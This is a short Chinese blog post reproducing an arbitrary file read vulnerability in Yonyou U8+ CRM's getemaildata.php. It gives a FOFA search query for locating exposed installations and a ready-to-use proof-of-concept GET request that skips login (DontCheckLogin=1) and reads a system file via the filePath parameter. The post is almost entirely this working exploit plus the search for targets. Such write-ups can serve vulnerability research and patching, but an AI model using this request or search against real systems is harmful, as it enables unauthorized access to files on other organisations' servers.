首页 > 编程札记 > 编程

用友U8+CRM 任意文件读取漏洞复现

阅读: 评论:0

用友U8+CRM 任意文件读取漏洞复现

用友U8+CRM 任意文件读取漏洞复现

用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,本文 只复现 任意文件读取。

fofa大法:

body="用友U8CRM"

:9072/login/login.php

poc:burp 抓包 get 请求 GET /ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini 替换即可

本文发布于:2024-02-02 10:11:35,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170683989443111.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

上一篇:用友U8+ CRM目录遍历漏洞复现
下一篇:软件测试之自动化测试(Day1)
标签:用友   漏洞   文件   CRM
留言与评论(共有 0 条评论)
   
验证码:
推荐文章
排行榜
热门标签

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23